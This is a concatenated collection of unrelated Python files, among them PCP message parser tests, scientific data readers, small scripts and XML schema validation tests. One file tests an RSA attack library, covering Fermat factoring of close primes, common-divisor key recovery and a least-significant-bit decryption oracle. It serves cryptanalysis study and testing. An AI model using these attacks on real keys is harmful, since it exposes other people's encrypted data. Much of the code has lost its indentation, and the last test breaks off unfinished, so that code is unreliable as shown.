def test_parse_pcp_message_data_length_not_multiplier_of_four(self):
pcp_message = pcpmessage.PcpMessage.parse(
self.pcp_data_request_announce_common + '\x00', self.pcp_client_ip)
self.assertEqual(pcp_message.parse_result, pcpmessage.PcpResultCodes.MALFORMED_REQUEST)
def test_parse_pcp_message_data_length_greater_than_maximum(self):
pcp_message = pcpmessage.PcpMessage.parse(
self.pcp_data_request_announce_common + '\x00' * 1100, self.pcp_client_ip)
self.assertEqual(pcp_message.parse_result, pcpmessage.PcpResultCodes.MALFORMED_REQUEST)
def test_parse_pcp_request_map_invalid_data_length(self):
pcp_message = pcpmessage.PcpMessage.parse(
self.pcp_data_request_map_common + self.pcp_data_map[:10], self.pcp_client_ip)
self.assertEqual(pcp_message.parse_result, pcpmessage.PcpResultCodes.MALFORMED_REQUEST)
def test_parse_pcp_request_peer_invalid_data_length(self):
pcp_message = pcpmessage.PcpMessage.parse(
self.pcp_data_request_map_common + self.pcp_data_peer[:20], self.pcp_client_ip)
self.assertEqual(pcp_message.parse_result, pcpmessage.PcpResultCodes.MALFORMED_REQUEST)
def test_parse_pcp_request_unsupported_version(self):
self.pcp_data_request_announce_common = '\x01' + self.pcp_data_request_announce_common[1:]
pcp_message = pcpmessage.PcpMessage.parse(self.pcp_data_request_announce_common, self.pcp_client_ip)
self.assertEqual(pcp_message.parse_result, pcpmessage.PcpResultCodes.UNSUPP_VERSION)
def test_parse_pcp_request_unsupported_opcode(self):
unsupported_opcode = '\x07'
self.pcp_data_request_announce_common = (self.pcp_data_request_announce_common[0] +
unsupported_opcode + self.pcp_data_request_announce_common[2:])
pcp_message = pcpmessage.PcpMessage.parse(self.pcp_data_request_announce_common, self.pcp_client_ip)
self.assertEqual(pcp_message.parse_result, pcpmessage.PcpResultCodes.UNSUPP_OPCODE)
def test_parse_pcp_request_ip_address_mismatch(self):
pcp_message = pcpmessage.PcpMessage.parse(self.pcp_data_request_announce_common, "192.168.1.100")
self.assertEqual(pcp_message.parse_result, pcpmessage.PcpResultCodes.ADDRESS_MISMATCH)
def test_parse_pcp_request_map_malformed_request(self):
# Non-zero lifetime, zero protocol, non-zero internal port
protocol = '\x00'
self.pcp_data_map = self.pcp_data_map[:12] + protocol + self.pcp_data_map[13:]
pcp_message = pcpmessage.PcpMessage.parse(
self.pcp_data_request_map_common + self.pcp_data_map, self.pcp_client_ip)
self.assertEqual(pcp_message.parse_result, pcpmessage.PcpResultCodes.MALFORMED_REQUEST)
def test_parse_pcp_request_map_unsupported_zero_internal_port(self):
internal_port = '\x00\x00'
self.pcp_data_map = self.pcp_data_map[:16] + internal_port + self.pcp_data_map[18:]
pcp_message = pcpmessage.PcpMessage.parse(
self.pcp_data_request_map_common + self.pcp_data_map, self.pcp_client_ip)
self.assertEqual(pcp_message.parse_result, pcpmessage.PcpResultCodes.UNSUPP_PROTOCOL)
def test_serialize_pcp_request_map(self):
fields = self.pcp_fields_request_map_common
fields.update(self.pcp_fields_map)
pcp_message = pcpmessage.PcpMessage(**fields)
expected_data = self.pcp_data_request_map_common + self.pcp_data_map
self.assertEqual(pcp_message.serialize(), expected_data)
def test_serialize_pcp_request_peer(self):
fields = self.pcp_fields_request_peer_common
fields.update(self.pcp_fields_peer)
pcp_message = pcpmessage.PcpMessage(**fields)
expected_data = self.pcp_data_request_peer_common + self.pcp_data_peer
self.assertEqual(pcp_message.serialize(), expected_data)
def test_serialize_pcp_request_announce(self):
pcp_message = pcpmessage.PcpMessage(**self.pcp_fields_request_announce_common)
expected_data = self.pcp_data_request_announce_common
self.assertEqual(pcp_message.serialize(), expected_data)
def test_serialize_pcp_response_map(self):
fields = self.pcp_fields_response_map_common
fields.update(self.pcp_fields_map)
pcp_message = pcpmessage.PcpMessage(**fields)
expected_data = self.pcp_data_response_map_common + self.pcp_data_map
self.assertEqual(pcp_message.serialize(), expected_data)
def test_serialize_pcp_response_unsuccessful_result_code_copy_pcp_client_ip_addr_part(self):
pcp_message = pcpmessage.PcpMessage(**self.pcp_fields_response_map_common)
pcp_message.update(self.pcp_fields_map)
pcp_message['pcp_client_ip'] = "192.168.1.1"
pcp_response_data = self.pcp_data_response_map_common[:len(self.pcp_data_response_map_common)-12]
pcp_response_data += '\x00\x00\x00\x00\x00\x00\xff\xff\xc0\xa8\x01\x01'
expected_data = pcp_response_data + self.pcp_data_map
self.assertEqual(pcp_message.serialize(), expected_data)
|
from dataclasses import dataclass, field
from typing import Dict, List, Tuple
from neighborly.core.ecs import Component
from neighborly.plugins.default_plugin.character_values import CharacterValues
@dataclass(frozen=True)
class Activity:
"""Activities that a character can do at a location in the town
Attributes
----------
name: str
The name of the activity
traits_names: Tuple[str, ...]
Character values that associated with this activity
character_traits: CharacterValues
CharacterValues instance that encodes the list of trait_names
as a vector of 0's and 1's for non-applicable and applicable
character values respectively.
"""
name: str
trait_names: Tuple[str, ...]
character_traits: CharacterValues = field(init=False)
def __post_init__(self) -> None:
object.__setattr__(
self,
"character_traits",
CharacterValues({name: 1 for name in self.trait_names}, default=0),
)
_activity_registry: Dict[str, Activity] = {}
_activity_flags: Dict[str, int] = {}
def register_activity(activity: Activity) -> None:
"""Registers an activity instance for use in other places"""
next_flag = 1 << len(_activity_registry.keys())
_activity_registry[activity.name] = activity
_activity_flags[activity.name] = next_flag
def get_activity_flags(*activities: str) -> Tuple[int, ...]:
"""Return flags corresponding to given activities"""
return tuple([_activity_flags[activity] for activity in activities])
def get_activity(activity: str) -> Activity:
"""Return Activity instance corresponding to a given string"""
return _activity_registry[activity]
def get_all_activities() -> List[Activity]:
"""Return all activity instances in the registry"""
return list(_activity_registry.values())
class ActivityCenter(Component):
def __init__(self, activities: List[str]) -> None:
self.activities: List[str] = activities
self.activity_flags: int = 0
for activity in self.activities:
self.activity_flags |= get_activity_flags(activity)[0]
def has_flags(self, *flag_strs: str) -> bool:
flags = get_activity_flags(*flag_strs)
for flag in flags:
if self.activity_flags & flag == 0:
return False
return True
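# A minimal usage sketch (the activity and trait names here are hypothetical
# and assume CharacterValues accepts arbitrary value names; flags are powers
# of two assigned in registration order):
if __name__ == "__main__":
    register_activity(Activity("reading", ("curiosity",)))
    register_activity(Activity("sports", ("athleticism",)))
    print(get_activity_flags("reading", "sports"))  # e.g. (1, 2)
    print(get_activity("reading").character_traits)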
|
#!/bin/python
fAna = open("ana.csv", "r")
rTimes = list()
rDict = dict()
#print(prefix + ",benchmark,solve mem,solve time,drat kb,drat sec,lrat kb,lrat sec,restarts,decisions,conflicts,propagations,mark proof sec,dump lrat sec, ana sec, anamem mb")
for l in fAna:
data = l.split(",")
rDict.update({data[2]:float(data[4])})
fStd = open("std.csv", "r")
for l in fStd:
data = l.split(",")
sTime = float(data[3])
dTime = float(data[6])
print(str(rDict[data[2]]-sTime) + "," + str(dTime))
|
from setuptools import setup
setup(name='pyffe',
version='0.1',
description='Tools and utils for PyCaffe',
# url='http://github.com/fabiocarrara/pyffe',
author='Fabio Carrara',
author_email='fabio.carrara@isti.cnr.it',
license='MIT',
packages=['pyffe', 'pyffe.models'],
zip_safe=False,
requires=['functools32', 'tqdm', 'pandas', 'lmdb', 'caffe']
)
|
#!/usr/bin/python
file = open("copy_data_to_file.txt", "w")
lines = []
while True:
    text = input("Enter value: ")
    if text == "CLOSE":
        file.close()
        break
    if text == "SAVE":
        for line in lines:
            file.write(line + "\n")
        lines = []
        continue
    else:
        lines.append(text)
        continue
|
from __future__ import division
import numpy as np
from numpy import log10
from scipy.interpolate import PchipInterpolator as interp1d
def seismic(f, ifo):
"""Seismic noise.
"""
return seismicAll(f, ifo)[0]
def seismicAll(f, ifo):
"""Seismic noise.
Return (noise, noise_vertical, noise_horizontal)
"""
hTable = ifo.Suspension.hTable
vTable = ifo.Suspension.vTable
theta = ifo.Suspension.VHCoupling.theta
# noise input, horizontal and vertical
if 'PlatformMotion' in ifo.Seismic:
if ifo.Seismic.PlatformMotion == 'BSC':
nt, nr = seisBSC(f)
elif ifo.Seismic.PlatformMotion == '6D':
nt, nr = seis6D(f)
else:
nt, nr = seisBSC(f)
else:
nt, nr = seisBSC(f)
# horizontal noise total
nh = (abs(hTable)**2) * nt**2
# vertical noise total
nv = (abs(theta * vTable)**2) * nt**2
# new total noise
n = nv + nh
# Convert into Strain PSD (4 TMs)
nh *= 4 * ifo.gwinc.dhdl_sqr
nv *= 4 * ifo.gwinc.dhdl_sqr
n *= 4 * ifo.gwinc.dhdl_sqr
return n, nh, nv
def seisBSC(f):
"""Rough ISI noise source spectra.
Returns ISI (translational, rotational) DOFs
"""
SEI_F = np.array([0.01, 0.03, 0.1, 0.2, 0.5, 1, 10, 30, 300])
# translational DOFs
SEI_T = np.array([3e-6, 1e-6, 2e-7, 2e-7, 8e-10, 1e-11, 3e-13, 3e-14, 3e-14])
nt = 10**(interp1d(SEI_F, log10(SEI_T))(f))
# rotational DOFs
SEI_R = np.array([1e-8, 3e-8, 2e-8, 1e-8, 4e-10, 1e-11, 3e-13, 3e-14, 3e-14])
nr = 10**(interp1d(SEI_F, log10(SEI_R))(f))
return nt, nr
def seis6D(f):
"""ISI noise source spectra with a 6D seismometer.
This largely follows Mow-Lowry and Martynov, arXiv:1801.01468.
"""
SEI_F = np.array([0.01, 0.03, 0.1, 0.2, 0.5, 1, 10, 100, 300])
SEI_T_self = np.array([1e-7, 1e-9, 3e-11, 6e-12, 3e-13, 1e-13, 3e-14, 1e-14, 1e-14])
nt_self = 10**(interp1d(SEI_F, log10(SEI_T_self))(f))
nt_gnd = 10*seisNLNM(f)
blend_t = np.abs(100/(1+1j*f/0.01)**4)
nt = np.sqrt(nt_self**2 + (blend_t * nt_gnd)**2)
SEI_R_self = np.array([2e-11, 5e-12, 1e-12, 6e-13, 3e-13, 2e-13, 6e-14, 2e-14, 2e-14])
nr_self = 10**(interp1d(SEI_F, log10(SEI_R_self))(f))
nr_gnd = np.abs(1e-7/(1+1j*f/0.001))
blend_r = np.abs(100/(1+1j*f/0.01)**4)
nr = np.sqrt(nr_self**2 + (blend_r * nr_gnd)**2)
return nt, nr
def seisNLNM(f):
"""The Peterson New Low-Noise Model.
Returns a displacement ASD.
"""
Pl = np.array([
1.00e-02, 1.00e-01, 1.70e-01, 4.00e-01, 8.00e-01, 1.24e+00,
2.40e+00, 4.30e+00, 5.00e+00, 6.00e+00, 1.00e+01, 1.20e+01,
1.56e+01, 2.19e+01, 3.16e+01, 4.50e+01, 7.00e+01, 1.01e+02,
1.54e+02, 3.28e+02, 6.00e+02, 1.00e+04])
Al = np.array([
-156.72, -162.36, -166.7 , -170. , -166.4 , -168.6 , -159.98,
-141.1 , -71.36, -97.26, -132.18, -205.27, -37.65, -114.37,
-160.58, -187.5 , -216.47, -185. , -168.34, -217.43, -258.28,
-346.88])
Bl = np.array([
5.64, 5.64, 0. , -8.3 , 28.9 , 52.48, 29.81,
0. , -99.77, -66.49, -31.57, 36.16, -104.33, -47.1 ,
-16.28, 0. , 15.7 , 0. , -7.61, 11.9 , 26.6 ,
48.75])
nlnm = 10**(np.interp(1/f, Pl, Al+Bl*np.log10(Pl))/20) / (2 * np.pi * f)**2
return nlnm
def seisNHNM(f):
"""The Peterson New High-Noise Model.
Returns a displacement ASD.
"""
Pl = np.array([
1.00e-01, 2.20e-01, 3.20e-01, 8.00e-01, 3.80e+00,
4.60e+00, 6.30e+00, 7.90e+00, 1.54e+01, 2.00e+01,
3.54e+02,
])
Al = np.array([
-108.73, -150.34, -122.31, -116.85, -108.48,
-74.66, 0.66, -93.37, 73.54, -151.52,
-206.66,
])
Bl = np.array([
-17.23, -80.50, -23.87, 32.51, 18.08,
-32.95, -127.18, -22.42, -162.98, 10.01,
31.63,
])
nhnm = 10**(np.interp(1/f, Pl, Al+Bl*np.log10(Pl))/20) / (2 * np.pi * f)**2
return nhnm
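# Minimal usage sketch (assumed standalone use of the ground-motion helpers
# above): evaluate the models on a log-spaced frequency band.
if __name__ == "__main__":
    freq = np.logspace(-1, 2, 100)   # 0.1 Hz to 100 Hz
    nt, nr = seisBSC(freq)           # ISI translational / rotational ASDs
    print(nt[:3], nr[:3])
    print(seisNLNM(freq)[:3])        # Peterson low-noise displacement ASD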
|
from bytemaps import sys
from bytemaps import Dataset
from bytemaps import Verify
from bytemaps import get_data
from bytemaps import ibits
from bytemaps import is_bad
from bytemaps import where
class ASCATAveraged(Dataset):
""" Read averaged ASCAT bytemaps. """
"""
Public data:
filename = name of data file
missing = fill value used for missing data;
if None, then fill with byte codes (251-255)
dimensions = dictionary of dimensions for each coordinate
variables = dictionary of data for each variable
"""
def __init__(self, filename, missing=-999.):
"""
Required arguments:
filename = name of data file to be read (string)
Optional arguments:
missing = fill value for missing data,
default is the value used in verify file
"""
self.filename = filename
self.missing = missing
Dataset.__init__(self)
# Dataset:
def _attributes(self):
return ['coordinates','long_name','units','valid_min','valid_max']
def _coordinates(self):
return ('variable','latitude','longitude')
def _shape(self):
return (4,720,1440)
def _variables(self):
return ['windspd','winddir','scatflag','radrain','sos',
'longitude','latitude','land','ice','nodata']
# _default_get():
def _get_index(self,var):
return {'windspd' : 0,
'winddir' : 1,
'rain' : 2,
'sos' : 3,
}[var]
def _get_scale(self,var):
return {'windspd' : 0.2,
'winddir' : 1.5,
'sos' : 0.02,
}[var]
# _get_ attributes:
def _get_long_name(self,var):
return {'windspd' : '10-m Surface Wind Speed',
'winddir' : '10-m Surface Wind Direction',
'scatflag' : 'Scatterometer Rain Flag',
'radrain' : 'Radiometer Rain Flag',
'sos' : 'Measured-Model Sum-of-Squares Residual',
'longitude' : 'Grid Cell Center Longitude',
'latitude' : 'Grid Cell Center Latitude',
'land' : 'Is this land?',
'ice' : 'Is this ice?',
'nodata' : 'Is there no data?',
}[var]
def _get_units(self,var):
return {'windspd' : 'm/s',
'winddir' : 'deg oceanographic',
'scatflag' : '0=no-rain, 1=rain',
'radrain' : '0=no-rain, -1=adjacent rain, >0=rain(mm/hr)',
'sos' : 'non-dimensional',
'longitude' : 'degrees east',
'latitude' : 'degrees north',
'land' : 'True or False',
'ice' : 'True or False',
'nodata' : 'True or False',
}[var]
def _get_valid_min(self,var):
return {'windspd' : 0.0,
'winddir' : 0.0,
'scatflag' : 0,
'radrain' : -1,
'sos' : 0.0,
'longitude' : 0.0,
'latitude' : -90.0,
'land' : False,
'ice' : False,
'nodata' : False,
}[var]
def _get_valid_max(self,var):
return {'windspd' : 50.0,
'winddir' : 360.0,
'scatflag' : 1,
'radrain' : 31,
'sos' : 5.0,
'longitude' : 360.0,
'latitude' : 90.0,
'land' : True,
'ice' : True,
'nodata' : True,
}[var]
# _get_ variables:
def _get_scatflag(self,var,bmap):
indx = self._get_index('rain')
scatflag = get_data(ibits(bmap,ipos=0,ilen=1),indx=indx)
bad = is_bad(get_data(bmap,indx=0))
scatflag[bad] = self.missing
return scatflag
def _get_radrain(self,var,bmap):
indx = self._get_index('rain')
radrain = get_data(ibits(bmap,ipos=1,ilen=1),indx=indx)
good = (radrain == 1)
radrain[~good] = self.missing
intrain = get_data(ibits(bmap,ipos=2,ilen=6),indx=indx)
nonrain = where(intrain == 0)
adjrain = where(intrain == 1)
hasrain = where(intrain > 1)
intrain[nonrain] = 0.0
intrain[adjrain] = -1.0
intrain[hasrain] = 0.2*(intrain[hasrain])-0.2
radrain[good] = intrain[good]
bad = is_bad(get_data(bmap,indx=0))
radrain[bad] = self.missing
return radrain
class ThreedayVerify(Verify):
""" Contains info for verification. """
def __init__(self,dataset):
self.filename = 'ascat_v02.1_averaged_verify.txt'
self.ilon1 = 170
self.ilon2 = 175
self.ilat1 = 274
self.ilat2 = 278
self.variables = ['windspd','winddir','scatflag','radrain']
self.startline = 16
self.columns = {'windspd' : 3,
'winddir' : 4,
'scatflag' : 5,
'radrain' : 6,
'sos' : 7}
dataset = set_verify_flags(dataset,self.variables)
Verify.__init__(self,dataset)
class WeeklyVerify(Verify):
""" Contains info for verification. """
def __init__(self,dataset):
self.filename = 'ascat_v02.1_averaged_verify.txt'
self.ilon1 = 170
self.ilon2 = 175
self.ilat1 = 274
self.ilat2 = 278
self.variables = ['windspd','winddir','scatflag','radrain']
self.startline = 49
self.columns = {'windspd' : 3,
'winddir' : 4,
'scatflag' : 5,
'radrain' : 6,
'sos' : 7}
dataset = set_verify_flags(dataset,self.variables)
Verify.__init__(self,dataset)
class MonthlyVerify(Verify):
""" Contains info for verification. """
def __init__(self,dataset):
self.filename = 'ascat_v02.1_averaged_verify.txt'
self.ilon1 = 170
self.ilon2 = 175
self.ilat1 = 274
self.ilat2 = 278
self.variables = ['windspd','winddir','scatflag','radrain']
self.startline = 83
self.columns = {'windspd' : 3,
'winddir' : 4,
'scatflag' : 5,
'radrain' : 6,
'sos' : 7}
dataset = set_verify_flags(dataset,self.variables)
Verify.__init__(self,dataset)
def set_verify_flags(dataset,variables):
for avar in variables:
if avar == 'mingmt': continue
dataset.variables[avar][dataset.variables['land']] = -555.
return dataset
if __name__ == '__main__':
""" Automated testing. """
# read 3-day averaged:
ascat = ASCATAveraged('ascat_20071022_v02.1_3day.gz')
if not ascat.variables: sys.exit('file not found')
# verify 3-day:
verify = ThreedayVerify(ascat)
if verify.success: print('successful verification for 3-day')
else: sys.exit('verification failed for 3-day')
print('')
# read weekly averaged:
ascat = ASCATAveraged('ascat_20071027_v02.1.gz')
if not ascat.variables: sys.exit('file not found')
# verify weekly:
verify = WeeklyVerify(ascat)
if verify.success: print('successful verification for weekly')
else: sys.exit('verification failed for weekly')
print('')
# read monthly averaged:
ascat = ASCATAveraged('ascat_200710_v02.1.gz')
if not ascat.variables: sys.exit('file not found')
# verify:
verify = MonthlyVerify(ascat)
if verify.success: print('successful verification for monthly')
else: sys.exit('verification failed for monthly')
print('')
print('all tests completed successfully')
print ('')
|
from typing import Tuple
from hypothesis import given
from ground.base import Context
from ground.hints import (Point,
Scalar)
from tests.utils import reverse_point_coordinates
from . import strategies
@given(strategies.contexts_with_points_and_scalars_pairs)
def test_basic(context_with_point_and_factors
: Tuple[Context, Point, Scalar, Scalar]) -> None:
context, point, factor_x, factor_y = context_with_point_and_factors
result = context.scale_point(point, factor_x, factor_y)
assert isinstance(result, context.point_cls)
@given(strategies.contexts_with_points_and_scalars_pairs)
def test_reversals(context_with_point_and_factors
: Tuple[Context, Point, Scalar, Scalar]) -> None:
context, point, factor_x, factor_y = context_with_point_and_factors
result = context.scale_point(point, factor_x, factor_y)
assert reverse_point_coordinates(result) == context.scale_point(
reverse_point_coordinates(point), factor_y, factor_x)
|
from binascii import hexlify
import pytest
from Cryptodome.Cipher import PKCS1_v1_5
from Cryptodome.PublicKey import RSA
from Cryptodome.Util.number import getPrime
from gmpy2 import mpz, next_prime, powmod
from hypothesis import assume, given, reject, settings
from hypothesis.strategies import integers, sampled_from, text
from cat.rsa.attacks import *
@pytest.fixture()
def key():
return RSA.generate(1024)
@pytest.fixture()
def close_primes():
p = getPrime(512)
q = int(next_prime(p))
return (p, q)
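# Note on the fixture above: Fermat factoring relies on |p - q| being small,
# since n = ((p + q) / 2)**2 - ((p - q) / 2)**2, so a short search upward from
# ceil(sqrt(n)) for an a with a**2 - n a perfect square recovers p and q.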
@pytest.fixture()
def plain_int():
return 512
def test_fermat_factoring(close_primes, plain_int):
p = close_primes[0]
q = close_primes[1]
plain = plain_int
e = 2 ** 16 + 1
pk = RSA.construct((p * q, e))
key = reconstruct_private(pk, p)
sk = fermat_factoring(pk)
cipher = powmod(plain, key.e, key.n)
assert int(powmod(cipher, sk.d, sk.n)) == plain
@given(integers(), integers(min_value=1))
@settings(deadline=None)
@pytest.mark.slow
def test_common_divisor(key, x, plain):
assume(0 < x < key.n)
assume(0 < plain < key.n)
sk = common_divisor(key.publickey(), key.p * x)
cipher = powmod(plain, key.e, key.n)
assert int(powmod(cipher, sk.d, sk.n)) == plain
def test_lsb_oracle_fix(key):
plain = 0xDEADBEEF
assert plain < key.n
d = mpz(key.d)
n = mpz(key.n)
def oracle(c):
return powmod(c, d, n) % 2
target = powmod(plain, key.e, key.n)
assert plain == lsb_oracle(key.publickey(), target, oracle)
@given(integers(min_value=1))
@settings(deadline=None)
@pytest.mark.slow
def test_lsb_oracle(key, plain):
assume(0 < plain < key.n)
d = mpz(key.d)
n = mpz(key.n)
def oracle(c):
return powmod(c, d, n) % 2
target = powmod(plain, key.e, key.n)
assert plain == lsb_oracle(key.publickey(), target, oracle)
|
from bs4 import BeautifulSoup
import re
def clean(raw_data):
if not isinstance(raw_data,str):
raw_data=str(raw_data)
    review_text = BeautifulSoup(raw_data, "html.parser").get_text()
letters_only = re.sub("[^a-zA-Z]", " ", review_text)
words = letters_only.lower().split()
return( " ".join(words))
def concat_users_text(post):
return post.groupby(["thread_num","user"],sort=False)["text"].apply(lambda x: x.sum()).reset_index()
def get_users_in_game(role, concat_df):
return concat_df.merge(role,on=['thread_num','user'])
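# Small usage sketch for clean() (the input string is illustrative):
# clean("<p>Hello, World 123!</p>") -> "hello world"
if __name__ == "__main__":
    print(clean("<p>Hello, World 123!</p>"))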
|
import prang
import os
import os.path
import pytest
from prang.validation import (
Name, Interleave, Element, EMPTY, ElementNode, QName, TEXT, After,
start_tag_close_deriv, after, interleave, children_deriv, text_deriv,
child_deriv, choice, NotAllowed, whitespace, Choice, OneOrMore,
start_tag_open_deriv, atts_deriv, one_or_more, strip_children_deriv,
group, nullable, end_tag_deriv, apply_after, flip)
from prang.simplification import PrangException
from functools import partial
def test_children_deriv_interleave():
schema = After(
Interleave(
Element(
Name({'ns': ''}, 'bar'),
EMPTY),
TEXT),
EMPTY)
doc = tuple()
deriv = children_deriv(schema, ('',))
assert str(children_deriv(schema, doc)) == str(deriv)
x = child_deriv(schema, '')
print("x is", x)
deriv = choice(schema, x) if whitespace('') else x
assert str(children_deriv(schema, '')) == str(deriv)
deriv = text_deriv(schema, '')
assert str(child_deriv(schema, '')) == str(deriv)
p1 = Interleave(
Element(
Name({'ns': ''}, 'bar'),
EMPTY),
TEXT)
p2 = EMPTY
deriv = After(text_deriv(p1, ''), p2)
assert str(text_deriv(schema, '')) == str(deriv)
p11 = Element(
Name({'ns': ''}, 'bar'),
EMPTY)
p12 = TEXT
deriv = choice(
interleave(text_deriv(p11, ''), p12),
interleave(p11, text_deriv(p12, '')))
assert str(text_deriv(p1, '')) == str(deriv)
deriv = NotAllowed()
assert str(text_deriv(p11, '')) == str(deriv)
deriv = NotAllowed()
assert str(interleave(NotAllowed(), p12)) == str(deriv)
deriv = TEXT
assert str(text_deriv(p12, '')) == str(deriv)
assert whitespace('') is True
schema = After(
Interleave(
Element(
Name({'ns': ''}, 'bar'),
EMPTY),
TEXT),
EMPTY)
deriv = Choice(
After(
Interleave(
Element(
Name({'ns': ''}, 'bar'),
EMPTY),
TEXT),
EMPTY),
After(
Interleave(
Element(
Name({'ns': ''}, 'bar'),
EMPTY),
TEXT),
EMPTY))
print('is', children_deriv(schema, doc))
print('should be', deriv)
assert str(children_deriv(schema, doc)) == str(deriv)
def test_start_tag_close_interleave():
p1 = Interleave(
Element(
Name({'ns': ''}, 'bar'),
EMPTY),
TEXT)
p2 = EMPTY
schema = After(
p1,
p2)
deriv = after(start_tag_close_deriv(p1), p2)
assert str(start_tag_close_deriv(schema)) == str(deriv)
schema = p1
p11 = Element(
Name({'ns': ''}, 'bar'),
EMPTY)
p12 = TEXT
deriv = interleave(start_tag_close_deriv(p11), start_tag_close_deriv(p12))
assert str(start_tag_close_deriv(schema)) == str(deriv)
schema = p11
deriv = schema
assert str(start_tag_close_deriv(schema)) == str(deriv)
schema = p12
deriv = schema
assert str(start_tag_close_deriv(schema)) == str(deriv)
schema = p2
deriv = schema
assert str(start_tag_close_deriv(schema)) == str(deriv)
schema = After(
Interleave(
Element(
Name({'ns': ''}, 'bar'),
EMPTY),
TEXT),
EMPTY)
deriv = schema
assert str(start_tag_close_deriv(schema)) == str(deriv)
def test_start_tag_close_simple():
schema = After(
EMPTY,
EMPTY)
deriv = After(EMPTY, EMPTY)
assert str(start_tag_close_deriv(schema)) == str(deriv)
def test_atts_deriv_interleave():
schema = After(
Interleave(
Element(
Name({'ns': ''}, 'bar'),
EMPTY),
TEXT),
EMPTY)
deriv = schema
doc = tuple()
assert str(atts_deriv(schema, doc)) == str(deriv)
def test_atts_deriv():
schema = After(
EMPTY,
EMPTY)
doc = tuple()
deriv = schema
assert str(atts_deriv(schema, doc)) == str(deriv)
def test_contains():
schema = Name({'ns': ''}, 'foo')
doc = QName('', 'foo')
assert prang.validation.contains(schema, doc) is True
def test_start_tag_open_deriv():
schema = Element(
Name({'ns': ''}, 'foo'), EMPTY)
doc = QName('', 'foo')
deriv = After(
EMPTY,
EMPTY)
assert str(start_tag_open_deriv(schema, doc)) == str(deriv)
def test_start_tag_open_deriv_interleave():
schema = Element(
Name({'ns': ''}, 'foo'),
Interleave(
Element(
Name({'ns': ''}, 'bar'),
EMPTY),
TEXT))
doc = QName('', 'foo')
deriv = After(
Interleave(
Element(
Name({'ns': ''}, 'bar'),
EMPTY),
TEXT),
EMPTY)
assert str(start_tag_open_deriv(schema, doc)) == str(deriv)
def test_interleave():
schema = Element(
Name({'ns': ''}, 'foo'),
Interleave(
Element(
Name({'ns': ''}, 'bar'),
EMPTY),
TEXT))
doc = ElementNode(QName('', 'foo'), tuple(), tuple())
assert str(child_deriv(schema, doc)) == str(NotAllowed())
def test_start_tag_open_deriv_one_or_more():
schema = Element(
Name({'ns': ''}, 'foo'),
Choice(
EMPTY,
OneOrMore(
Element(
Name({'ns': ''}, 'bar'),
EMPTY))))
doc = QName('', 'foo')
p2 = Choice(
EMPTY,
OneOrMore(
Element(
Name({'ns': ''}, 'bar'),
EMPTY)))
deriv = After(p2, EMPTY)
assert str(start_tag_open_deriv(schema, doc)) == str(deriv)
def test_atts_deriv_one_or_more():
schema = After(
Choice(
EMPTY,
OneOrMore(
Element(
Name({'ns': ''}, 'bar'),
EMPTY))),
EMPTY)
doc = ()
deriv = schema
assert str(atts_deriv(schema, doc)) == str(deriv)
def test_start_tag_close_deriv_one_or_more():
schema = After(
Choice(
EMPTY,
OneOrMore(
Element(
Name({'ns': ''}, 'bar'),
EMPTY))),
EMPTY)
p1 = Choice(
EMPTY,
OneOrMore(
Element(
Name({'ns': ''}, 'bar'),
EMPTY)))
p2 = EMPTY
deriv = after(start_tag_close_deriv(p1), p2)
assert str(start_tag_close_deriv(schema)) == str(deriv)
p11 = EMPTY
p12 = OneOrMore(
Element(
Name({'ns': ''}, 'bar'),
EMPTY))
deriv = choice(start_tag_close_deriv(p11), start_tag_close_deriv(p12))
assert str(start_tag_close_deriv(p1)) == str(deriv)
deriv = EMPTY
assert str(start_tag_close_deriv(p11)) == str(deriv)
p121 = Element(
Name({'ns': ''}, 'bar'),
EMPTY)
deriv = one_or_more(start_tag_close_deriv(p121))
assert str(start_tag_close_deriv(p12)) == str(deriv)
deriv = p121
assert str(start_tag_close_deriv(p121)) == str(deriv)
deriv = After(
Choice(
EMPTY,
OneOrMore(
Element(
Name({'ns': ''}, 'bar'),
EMPTY))),
EMPTY)
assert str(start_tag_close_deriv(schema)) == str(deriv)
def test_one_or_more_children_deriv():
schema = After(
Choice(
EMPTY,
OneOrMore(
Element(
Name({'ns': ''}, 'bar'),
EMPTY))),
EMPTY)
doc = ('x', ElementNode(QName('', 'bar'), tuple(), ()))
deriv = strip_children_deriv(schema, doc)
assert str(children_deriv(schema, doc)) == str(deriv)
x = child_deriv(schema, 'x')
y = child_deriv(x, doc[1])
assert str(strip_children_deriv(schema, doc)) == str(y)
deriv = text_deriv(schema, 'x')
assert str(child_deriv(schema, 'x')) == str(deriv)
p1 = Choice(
EMPTY,
OneOrMore(
Element(
Name({'ns': ''}, 'bar'),
EMPTY)))
p2 = EMPTY
deriv = after(text_deriv(p1, 'x'), p2)
assert str(text_deriv(schema, 'x')) == str(deriv)
p11 = EMPTY
p12 = OneOrMore(
Element(
Name({'ns': ''}, 'bar'),
EMPTY))
deriv = choice(text_deriv(p11, 'x'), text_deriv(p12, 'x'))
assert str(text_deriv(p1, 'x')) == str(deriv)
assert str(text_deriv(p11, 'x')) == str(NotAllowed())
p121 = Element(
Name({'ns': ''}, 'bar'),
EMPTY)
deriv = group(text_deriv(p121, 'x'), choice(OneOrMore(p121), EMPTY))
assert str(text_deriv(p12, 'x')) == str(deriv)
assert str(text_deriv(p121, 'x')) == str(NotAllowed())
def test_group():
assert str(group(NotAllowed(), EMPTY)) == str(NotAllowed())
def test_one_or_more():
schema = Element(
Name({'ns': ''}, 'foo'),
Choice(
EMPTY,
OneOrMore(
Element(
Name({'ns': ''}, 'bar'),
EMPTY))))
doc = ElementNode(
QName('', 'foo'), tuple(), (
'x', ElementNode(QName('', 'bar'), tuple(), ())))
assert str(child_deriv(schema, doc)) == str(NotAllowed())
def test_one_or_more_multiple():
schema = Element(
Name({'ns': ''}, 'foo'),
OneOrMore(
Element(
Name({'ns': ''}, 'bar'),
EMPTY)))
doc = ElementNode(
QName('', 'foo'), (), (
ElementNode(QName('', 'bar'), (), ()),
ElementNode(QName('', 'bar'), (), ()),
ElementNode(QName('', 'bar'), (), ())))
qn = QName('', 'foo')
d1 = start_tag_open_deriv(schema, qn)
m1 = After(
OneOrMore(
Element(
Name({'ns': ''}, 'bar'),
EMPTY)),
EMPTY)
assert str(d1) == str(m1)
atts = ()
d2 = atts_deriv(d1, atts)
m2 = m1
assert str(d2) == str(m2)
d3 = start_tag_close_deriv(d2)
m21 = OneOrMore(
Element(
Name({'ns': ''}, 'bar'),
EMPTY))
m211 = Element(
Name({'ns': ''}, 'bar'),
EMPTY)
m22 = EMPTY
m3_1 = after(start_tag_close_deriv(m21), m22)
assert str(m3_1) == str(d3)
m3_2 = after(start_tag_close_deriv(m21), EMPTY)
